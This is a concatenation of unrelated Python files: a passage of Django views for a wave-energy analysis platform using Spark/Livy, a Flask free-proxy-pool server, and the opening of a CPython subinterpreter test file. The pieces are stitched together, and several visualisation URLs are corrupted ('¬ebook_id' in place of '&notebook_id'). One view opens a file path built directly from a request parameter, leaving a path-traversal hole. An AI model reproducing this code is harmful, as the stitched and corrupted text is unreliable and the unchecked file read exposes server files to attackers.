close_livy_session(service_exec.livy_session)
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_LOAD_MATCHING_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wec_load_matching_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converter = str(result['name'][0])
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_load_matching result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Assessment of Wave Energy Generation and Load Matching',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technology used:', 'value': str(converter)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def energy_conversion_status(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
return JsonResponse({'status': service_exec.status})
@never_cache
def init(request):
execution_steps = dict()
execution_steps['LOCATION_EVALUATION_SERVICE'] = ['starting service', 'Initializing Spark Session'] + [x['status'] for x in settings.LOCATION_EVALUATION_SERVICE_PARAGRAPHS] + ['done']
execution_steps['WAVE_FORECAST_SERVICE'] = ['starting service', 'Initializing Spark Session'] + [x['status'] for x in settings.WAVE_FORECAST_SERVICE_PARAGRAPHS] + ['done']
execution_steps['AREA_EVALUATION_SERVICE'] = ['starting service', 'Initializing Spark Session'] + [x['status'] for x in settings.AREA_EVALUATION_SERVICE_PARAGRAPHS] + ['done']
execution_steps['DATA_VISUALISATION_SERVICE'] = ['starting service']
for dataset in DATASETS:
try:
service_dataset = Dataset.objects.get(pk=dataset["id"])
print "----------------brhkame dataset"
try:
dataset["min_lat"] = float(service_dataset.spatialSouth)
except:
dataset["min_lat"] = -90
try:
dataset["max_lat"] = float(service_dataset.spatialNorth)
except:
dataset["max_lat"] = 90
try:
dataset["min_lng"] = float(service_dataset.spatialWest)
except:
dataset["min_lng"] = -180
try:
dataset["max_lng"] = float(service_dataset.spatialEast)
except:
dataset["max_lng"] = 180
dataset["min_date"] = service_dataset.temporalCoverageBegin
dataset["max_date"] = service_dataset.temporalCoverageEnd
# print dataset["min_lat"]
# print dataset["max_lat"]
# print dataset["min_lng"]
# print dataset["max_lng"]
# print dataset["min_date"]
# print dataset["max_date"]
if service_dataset.id == 111:
dataset["max_date"] = datetime.now() + timedelta(days=7)
dataset["min_lat"] = 35
dataset["max_lat"] = 45
dataset["min_lng"] = -14
dataset["max_lng"] = -7
except:
print "dataset not found"
print 'pre creating livy session'
host = settings.LIVY_URL
headers = {'Content-Type': 'application/json', 'X-Requested-By': 'Admin'}
data = { 'kind': 'pyspark',
'jars': ['/user/livy/jars/postgresql-42.2.2.jar', '/user/livy/jars/presto-jdbc-0.213.jar'],
'driverMemory': '512m',
'driverCores': 1,
'numExecutors': 1,
'executorMemory': '3g',
'executorCores': 2,
'heartbeatTimeoutInSecond': 120,
'conf': {'spark.driver.maxResultSize': '2g'}}
response = requests.post(host + '/sessions', data=json.dumps(data), headers=headers).json()
return render(request, 'wave_energy_pilot/load_service.html',
{'buoys_list': BUOYS,
'datasets_list': DATASETS,
'data_radius': DATA_RADIUS,
'execution_steps': execution_steps})
@never_cache
def data_visualization_results(request):
service = Service.objects.get(pk=settings.DATA_VISUALISATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
# service_exec.save()
# print
start_date = request.GET["start_date"]
end_date = request.GET["end_date"]
latitude_from = float(request.GET["latitude_from"])
latitude_to = float(request.GET["latitude_to"])
longitude_from = float(request.GET["longitude_from"])
longitude_to = float(request.GET["longitude_to"])
dataset_id = request.GET["dataset_id"]
query_id = settings.DATA_VISUALISATION_SERVICE_DATASET_QUERY[dataset_id]
visualization_query_id = get_query_with_updated_filters(request, query_id)
variables_selection = request.GET.getlist("variables[]")
variable_list = find_visualization_variables(variables_selection, visualization_query_id)
y_var = ""
base_string = "y_var[]="
for variable in variable_list:
y_var += base_string + str(variable['query_variable']) + "&"
visualizations = dict()
visualizations['v1'] = ({'notebook_id': '',
'df': '',
'query': visualization_query_id,
'title': "Time Series Graph",
'url': "/visualizations/get_line_chart_am/?"+y_var+"x_var=i0_time&limit=False&agg_func=AVG&query="+str(visualization_query_id),
'done': False})
service_exec.dataframe_visualizations = visualizations
service_exec.save()
result = dict()
for var in variable_list:
result[str(var['variable'])] = dict()
result[str(var['variable'])]['title'] = str(var['title'])
result[str(var['variable'])]['unit'] = str(var['unit'])
min, max, avg = get_query_aggregates(visualization_query_id, var)
result[str(var['variable'])]['min'] = min
result[str(var['variable'])]['max'] = max
result[str(var['variable'])]['avg'] = avg
variable_list_with_commas = ''
for var in variable_list:
variable_list_with_commas += var['title'] + ', '
variable_list_with_commas = variable_list_with_commas[:-2]
dataset_title = Dataset.objects.get(pk=dataset_id).title
location_lat = str(latitude_from + abs(latitude_to-latitude_from)/2)
location_lon = str(longitude_from + abs(longitude_to - longitude_from) / 2)
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
try:
user_plan = UserPlans.objects.get(user=request.user)
user_plan.query_count -= 1
user_plan.save()
except:
pass
return render(request, 'wave_energy_pilot/data_visualisation result.html',
{'result': result,
'back_url': '/wave-energy/',
'service_title': 'Visualisation of a single data source',
'study_conditions': [
{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):', 'value': '('+location_lat+', '+location_lon+') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:', 'value': 'from '+ str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:',
'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/'+str(dataset_id)+'/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-info-circle', 'text': 'Selected variables:', 'value': str(variable_list_with_commas)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def single_location_evaluation_execute(request):
service = Service.objects.get(pk=settings.LOCATION_EVALUATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=single_location_evaluation_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def single_location_evaluation_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", "dataset_id"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.GET["dataset_id"]
query_id = settings.LOCATION_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
wave_height_query = AbstractQuery.objects.get(pk=int(wave_height_query_id))
twoDvar1 = wave_height_query.document['from'][0]['select'][0]['name']
twoDvar2 = wave_height_query.document['from'][1]['select'][0]['name']
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
# visualisations['v1'] = ({'notebook_id': '',
# 'df': '',
# 'query': wave_height_query_id,
# 'title': "Sea surface wave significant height",
# 'url': "/visualizations/get_line_chart_am/?y_var[]=i0_sea_surface_wave_significant_height&x_var=i0_time&limit=False&query="+str(wave_height_query_id),
# 'done': False})
visualisations['v2'] = ({'notebook_id': '',
'df': '',
'query': wave_height_query_id,
'title': "Occurrence matrix",
'url': "/visualizations/get_histogram_2d_am?viz_id=17&action=get_histogram_2d_am&y_var="+str(twoDvar1)+"&x_var="+str(twoDvar2)+"&bins=10&query=" + str(
wave_height_query_id),
'done': False})
visualisations['v3'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Power line chart",
'url': "/visualizations/get_line_chart_am/?y_var[]=power&y_var_unit=kW/m&x_var=time&df=power_df¬ebook_id="+str(new_notebook_id),
'done': False})
visualisations['v4'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Power histogram",
'url': "/visualizations/get_histogram_chart_am/?bins=5&x_var=power&x_var_unit=kW/m&df=power_df¬ebook_id="+str(new_notebook_id),
'done': False})
start_year = int(args_to_note['start_date'].split('-')[0])
end_year = int(args_to_note['end_date'].split('-')[0])
print start_year, end_year
power_availability_vars = ''
unit_list_1 = ''
for year in range(start_year, end_year+1):
power_availability_vars += '&y_var[]=power_'+str(year)
unit_list_1 += 'kW/m,'
unit_list_1 = unit_list_1[:-1]
power_availability_vars += '&y_var_unit=' + unit_list_1
visualisations['v5'] = ({'notebook_id': '',
'df': 'power_df_year_month',
'query': '',
'title': "Monthly availability of waves",
'url': "/visualizations/get_column_chart_am/?x_var=month_name&df=power_df_year_month¬ebook_id="+str(new_notebook_id) + str(power_availability_vars),
'done': False})
# visualisations['v5'] = ({'notebook_id': '',
# 'df': '',
# 'query': wave_height_query_id,
# 'title': "Monthly availability of waves",
# 'url': "/visualizations/get_time_series_am?viz_id=22&action=get_time_series_am&y_var[]=i0_sea_surface_wave_significant_height&temporal_resolution=date_trunc_month&agg_func=AVG&query=" + str(
# wave_height_query_id),
# 'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
service_exec.status = "Initializing Spark Session"
service_exec.save()
livy_session = create_service_livy_session(request, service_exec)
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.LOCATION_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def single_location_evaluation_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
try:
user_plan = UserPlans.objects.get(user=request.user)
user_plan.query_count -= 1
user_plan.save()
except:
pass
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/location_assessment result.html',
{'result': result,
'back_url': '/wave-energy/',
'service_title': 'Wave Energy - Evaluation of a single location',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def single_location_evaluation_status(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
return JsonResponse({'status': service_exec.status})
def cancel_execution(request, exec_instance):
print "Cancelling"
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service_exec.status = "failed"
service_exec.save()
close_livy_session(int(service_exec.livy_session))
clean_up_new_note(service_exec.notebook_id)
print "Cancelled?"
return JsonResponse({'status': "cancelled"})
@never_cache
def area_location_evaluation_execute(request):
service = Service.objects.get(pk=settings.AREA_EVALUATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=area_location_evaluation_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def area_location_evaluation_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", "dataset_id"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.GET["dataset_id"]
query_id = settings.AREA_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
visualisations['v1'] = ({'notebook_id': '',
'df': '',
'query': wave_height_query_id,
'title': "Mean significant wave height",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&contour_var0=i0_sea_surface_wave_significant_height&n_contours0=50&step0=0.1&agg_func=AVG&query0="+str(wave_height_query_id),
'done': False})
visualisations['v2'] = ({'notebook_id': '',
'df': '',
'query': wave_height_query_id,
'title': "Mean wave period",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&contour_var0=i1_sea_surface_wave_zero_upcrossing_period&n_contours0=50&step0=0.1&agg_func=AVG&query0=" + str(wave_height_query_id),
'done': False})
visualisations['v3'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Mean wave power",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&contour_var0=avg_power&contour_var_unit0=kW/m&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=power_df¬ebook_id0=" + str(new_notebook_id),
'done': False})
visualisations['v4'] = ({'notebook_id': '',
'df': '',
'query': wave_height_query_id,
'title': "Maximum significant wave height",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&contour_var0=i0_sea_surface_wave_significant_height&n_contours0=50&step0=0.1&agg_func=MAX&query0=" + str(
wave_height_query_id),
'done': False})
visualisations['v5'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Maximum wave power",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&contour_var0=max_power&contour_var_unit0=kW/m&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=power_df¬ebook_id0=" + str(new_notebook_id),
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
service_exec.status = "Initializing Spark Session"
service_exec.save()
livy_session = create_service_livy_session(request, service_exec)
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.AREA_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
clean_up_new_note(service_exec.notebook_id)
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
def area_location_evaluation_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
latitude_from = str(result['latitude_from'])
latitude_to = str(result['latitude_to'])
longitude_from = str(result['longitude_from'])
longitude_to = str(result['longitude_to'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
try:
user_plan = UserPlans.objects.get(user=request.user)
user_plan.query_count -= 3
user_plan.save()
except:
pass
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/area_assessment result.html',
{'result': result,
'back_url': '/wave-energy/',
'service_title': 'Wave Energy - Wave atlas of a region',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': 'from (' + latitude_from + ', ' + longitude_from + ') to (' + latitude_to + ', ' + longitude_to + ')'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def area_location_evaluation_status(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
return JsonResponse({'status': service_exec.status})
@never_cache
def wave_forecast_execute(request):
service = Service.objects.get(pk=settings.WAVE_FORECAST_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=wave_forecast_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wave_forecast_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", 'dataset_id']
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.GET["dataset_id"]
query_id = settings.WAVE_FORECAST_SERVICE_DATASET_QUERY[dataset_id]
wave_forecast_query_id = get_query_with_updated_filters(request, query_id)
wave_forecast_query = AbstractQuery.objects.get(pk=int(wave_forecast_query_id))
twoDvar1 = wave_forecast_query.document['from'][0]['select'][0]['name']
twoDvar2 = wave_forecast_query.document['from'][1]['select'][0]['name']
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
visualisations['v1'] = ({'notebook_id': '',
'df': '',
'query': wave_forecast_query_id,
'url': "/visualizations/get_line_chart_am/?y_var[]="+twoDvar1+"&x_var=i0_time&limit=False&query="+str(wave_forecast_query_id),
'done': False,
'title': 'Wave significant height'})
visualisations['v2'] = ({'notebook_id': '',
'df': '',
'query': wave_forecast_query_id,
'url': "/visualizations/get_line_chart_am/?y_var[]="+twoDvar2+"&x_var=i0_time&limit=False&query=" + str(
wave_forecast_query_id),
'done': False,
'title': 'Wave mean period'})
visualisations['v3'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'url': "/visualizations/get_line_chart_am/?y_var[]=power&y_var_unit=kW&x_var=time&df=power_df¬ebook_id="+str(new_notebook_id),
'done': False,
'title': 'Wave Energy'})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
service_exec.status = "Initializing Spark Session"
service_exec.save()
livy_session = create_service_livy_session(request, service_exec)
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WAVE_FORECAST_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
clean_up_new_note(service_exec.notebook_id)
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wave_forecast_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
try:
user_plan = UserPlans.objects.get(user=request.user)
user_plan.query_count -= 2
user_plan.save()
except:
pass
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wave_forecast result.html',
{'result': result,
'back_url': '/wave-energy/',
'service_title': 'Wave Energy - Wave forecast in a location',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wave_forecast_status(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
return JsonResponse({'status': service_exec.status})
def get_load_matching_file_data(request):
import csv
result_list = list()
file_name = request.GET['file']
file_path = 'wave_energy_pilot/static/wave_energy_pilot/files/load_matching/'+file_name
# file_path = 'visualizer/static/visualizer/files/kml2.json'
with open(file_path, mode="r") as infile:
reader = csv.reader(infile)
result_list = [{"time": rows[0], "value": rows[1]} for rows in reader if len(rows) > 0]
return JsonResponse({"result": result_list[1:]})
|
web_app.py
|
from flask import Flask, g, render_template
from multiprocessing import Process
from module import verifyIP
import redis
import threading
from tools.settings import *
__all__ = ['app']
app = Flask(__name__)
def get_conn():
if not hasattr(g, 'conn_redis'):
redis_pool = redis.ConnectionPool(host='127.0.0.1', port=6379)
g.conn_redis = redis.Redis(connection_pool=redis_pool)
return g.conn_redis
@app.route('/')
def index():
return render_template('index.html')
# 随机http代理
@app.route('/random_http')
def get_proxy():
conn = get_conn()
result = conn.srandmember("freeProxy:AfterVerifyOKhttp", 1)
if result:
ip = result[0]
return ip
else:
return "HTTP proxies is empty"
# 随机https代理
@app.route('/random_https')
def get_proxy_s():
conn = get_conn()
result = conn.srandmember("freeProxy:AfterVerifyOKhttps", 1)
if result:
ip = result[0]
return ip
else:
return "HTTPS proxies is empty"
# 代理池总量
@app.route('/count')
def get_counts():
conn = get_conn()
http_before = conn.scard("freeProxy:BeforeVerifyhttp")
https_before = conn.scard("freeProxy:BeforeVerifyhttps")
http_after_bad = conn.scard("freeProxy_Bad:AfterVerifyFailhttp")
https_after_bad = conn.scard("freeProxy_Bad:AfterVerifyFailhttps")
http_after_ok = conn.scard("freeProxy:AfterVerifyOKhttp")
https_after_ok = conn.scard("freeProxy:AfterVerifyOKhttps")
return render_template('count.html',
http_before=http_before,
https_before=https_before,
http_after_bad=http_after_bad,
https_after_bad=https_after_bad,
http_after_ok=http_after_ok,
https_after_ok=https_after_ok)
if __name__ == '__main__':
print('代理池开始运行')
POOL = redis.ConnectionPool(host='127.0.0.1', port=6379)
CONN_REDIS = redis.Redis(connection_pool=POOL)
# 多线程采集免费代理
# 动态获取所有方法
jobs = []
print(dir())
for attr in dir():
if attr.startswith("proxy__"):
# nianshao.me网站已经关闭,这里弃用
if attr not in ["proxy__test", "proxy__nianshao"]:
# 所有proxy__开头的方法都加入jobs列表
jobs.append(threading.Thread(target=locals()[attr], args=(CONN_REDIS,)))
# 开启多线程
for t in jobs:
t.start()
# 开启验证线程
verify_process = Process(target=verifyIP.fresh_proxy_thread_task)
verify_process.start()
# 开启web
app.run(host="0.0.0.0", port=7865)
|
test__xxsubinterpreters.py
|
from collections import namedtuple
import contextlib
import itertools
import os
import pickle
import sys
from textwrap import dedent
import threading
import time
import unittest
from test import support
from test.support import script_helper
interpreters = support.import_module('_xxsubinterpreters')
##################################
# helpers
def powerset(*sets):
return itertools.chain.from_iterable(
combinations(sets, r)
for r in range(len(sets)+1))
def _captured_script(script):
r, w = os.pipe()
indented = script.replace('\n', '\n ')
wrapped = dedent(f"""
import contextlib
with open({w}, 'w') as spipe:
with contextlib.redirect_stdout(spipe):
{indented}
""")
return wrapped, open(r)
def _run_output(interp, request, shared=None):
script, rpipe = _captured_script(request)
with rpipe:
interpreters.run_string(interp, script, shared)
return rpipe.read()
@contextlib.contextmanager
def _running(interp):
r, w = os.pipe()
def run():
interpreters.run_string(interp, dedent(f"""
# wait for "signal"
with open({r}) as rpipe:
rpipe.read()
"""))
t = threading.Thread(target=run)
t.start()
yield
with open(w, 'w') as spipe:
spipe.write('done')
t.join()
#@contextmanager
#def run_threaded(id, source, **shared):
# def run():
# run_interp(id, source, **shared)
# t = threading.Thread(target=run)
# t.start()
# yield
# t.join()
def run_interp(id, source, **shared):
_run_interp(id, source, shared)
def _run_interp(id, source, shared, _mainns={}):
source = dedent(source)
main = interpreters.get_main()
if main == id:
if interpreters.get_current() != main:
raise RuntimeError
# XXX Run a func?
exec(source, _mainns)
else:
interpreters.run_string(id, source, shared)
def run_interp_threaded(id, source, **shared):
def run():
_run(id, source, shared)
t = threading.Thread(target=run)
t.start()
t.join()
class Interpreter(namedtuple('Interpreter', 'name id')):
@classmethod
def from_raw(cls, raw):
if isinstance(raw, cls):
return raw
elif isinstance(raw, str):
return cls(raw)
else:
raise NotImplementedError
def __new__(cls, name=None, id=None):
main = interpreters.get_main()
if id == main:
if not name:
name = 'main'
elif name != 'main':
raise ValueError(
'name mismatch (expected "main", got "{}")'.format(name))
id = main
elif id is not None:
if not name:
name = 'interp'
elif name == 'main':
raise ValueError('name mismatch (unexpected "main")')
if not isinstance(id, interpreters.InterpreterID):
id = interpreters.InterpreterID(id)
elif not name or name == 'main':
name = 'main'
id = main
else:
id = interpreters.create()
self = super().__new__(cls, name, id)
return self
# XXX expect_channel_closed() is unnecessary once we improve exc propagation.
@contextlib.contextmanager
def expect_channel_closed():
try:
yield
